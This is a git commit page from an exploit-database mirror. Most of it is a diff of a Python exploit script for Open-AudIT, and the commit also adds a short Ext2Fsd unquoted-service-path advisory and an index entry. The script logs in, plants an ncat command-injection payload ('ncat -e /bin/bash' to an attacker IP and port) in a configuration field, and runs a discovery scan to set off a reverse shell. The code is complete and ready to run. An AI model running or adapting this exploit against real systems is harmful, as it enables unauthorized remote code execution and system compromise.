DB: 2021-03-25
2 changes to exploits/shellcodes Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
This commit is contained in:
parent
3f12367de8
commit
2f2c713a12
3 changed files with 56 additions and 32 deletions
|
@ -16,44 +16,40 @@ import string
|
|||
from bs4 import BeautifulSoup
|
||||
from urllib.parse import quote
|
||||
|
||||
warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
|
||||
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
|
||||
|
||||
|
||||
if len(sys.argv) !=3D 6:
|
||||
print("[~] Usage : ./openaudit-exploit.py url username password ip port=
|
||||
")
|
||||
if len(sys.argv) != 6:
|
||||
print("[~] Usage : ./openaudit-exploit.py url username password ip port")
|
||||
exit()
|
||||
|
||||
url =3D sys.argv[1]
|
||||
username =3D sys.argv[2]
|
||||
password =3D sys.argv[3]
|
||||
ip =3D sys.argv[4]
|
||||
port =3D sys.argv[5]
|
||||
url = sys.argv[1]
|
||||
username = sys.argv[2]
|
||||
password = sys.argv[3]
|
||||
ip = sys.argv[4]
|
||||
port = sys.argv[5]
|
||||
|
||||
request =3D requests.session()
|
||||
request = requests.session()
|
||||
|
||||
def inject_payload():
|
||||
configuration_path =3D url+"/en/omk/open-audit/configuration/90"
|
||||
data =3D 'data=3D{"data":{"id":"90","type":"configuration","attributes"=
|
||||
:{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, =
|
||||
port)
|
||||
configuration_path = url+"/en/omk/open-audit/configuration/90"
|
||||
data = 'data={"data":{"id":"90","type":"configuration","attributes":{"value":";ncat${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s${IFS};"}}}' % (ip, port)
|
||||
request.patch(configuration_path, data)
|
||||
print("[+] Payload injected in settings")
|
||||
|
||||
|
||||
def start_discovery():
|
||||
discovery_path =3D url+"/en/omk/open-audit/discoveries/create"
|
||||
post_discovery_path =3D url+"/en/omk/open-audit/discoveries"
|
||||
scan_name =3D "".join([random.choice(string.ascii_uppercase) for i in r=
|
||||
ange(10)])
|
||||
req =3D request.get(discovery_path)
|
||||
discovery_path = url+"/en/omk/open-audit/discoveries/create"
|
||||
post_discovery_path = url+"/en/omk/open-audit/discoveries"
|
||||
scan_name = "".join([random.choice(string.ascii_uppercase) for i in range(10)])
|
||||
req = request.get(discovery_path)
|
||||
|
||||
response =3D req.text
|
||||
soup =3D BeautifulSoup(response, "html5lib")
|
||||
token =3D soup.findAll('input')[5].get("value")
|
||||
buttons =3D soup.findAll("button")
|
||||
headers =3D {"Referer" : discovery_path}
|
||||
request_data =3D {
|
||||
response = req.text
|
||||
soup = BeautifulSoup(response, "html5lib")
|
||||
token = soup.findAll('input')[5].get("value")
|
||||
buttons = soup.findAll("button")
|
||||
headers = {"Referer" : discovery_path}
|
||||
request_data = {
|
||||
"data[attributes][name]":scan_name,
|
||||
"data[attributes][other][subnet]":"10.10.10.1/24",
|
||||
"data[attributes][other][ad_server]":"",
|
||||
|
@ -101,23 +97,21 @@ ange(10)])
|
|||
|
||||
}
|
||||
print("[+] Creating discovery ..")
|
||||
req =3D request.post(post_discovery_path, data=3Drequest_data, headers=
|
||||
=3Dheaders, allow_redirects=3DFalse)
|
||||
disocvery_url =3D url + req.headers['Location'] + "/execute"
|
||||
req = request.post(post_discovery_path, data=request_data, headers=headers, allow_redirects=False)
|
||||
disocvery_url = url + req.headers['Location'] + "/execute"
|
||||
print("[+] Triggering payload ..")
|
||||
print("[+] Check your nc ;)")
|
||||
request.get(disocvery_url)
|
||||
|
||||
|
||||
def login():
|
||||
login_info =3D {
|
||||
login_info = {
|
||||
"redirect_url": "/en/omk/open-audit",
|
||||
"username": username,
|
||||
"password": password
|
||||
}
|
||||
login_request =3D request.post(url+"/en/omk/open-audit/login", login_in=
|
||||
fo)
|
||||
login_text =3D login_request.text
|
||||
login_request = request.post(url+"/en/omk/open-audit/login", login_info)
|
||||
login_text = login_request.text
|
||||
if "There was an error authenticating" in login_text:
|
||||
return False
|
||||
else:
|
||||
|
|
29
exploits/windows/local/49706.txt
Normal file
29
exploits/windows/local/49706.txt
Normal file
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path
|
||||
# Date: 2021-1-19
|
||||
# Exploit Author: Mohammed Alshehri
|
||||
# Software Link: https://sourceforge.net/projects/ext2fsd/files/latest/download
|
||||
# Version: 0.68
|
||||
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
|
||||
|
||||
|
||||
# Service info:
|
||||
C:\Users\m507>sc qc Ext2Srv
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: Ext2Srv
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\Ext2Fsd\Ext2Srv.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Ext2 Management Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
C:\Users\m507>
|
||||
|
||||
|
||||
# Exploit:
|
||||
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
|
|
@ -11308,6 +11308,7 @@ id,file,description,date,author,type,platform,port
|
|||
49702,exploits/windows/local/49702.txt,"ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
|
||||
49703,exploits/windows/local/49703.txt,"ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
|
||||
49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows,
|
||||
49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue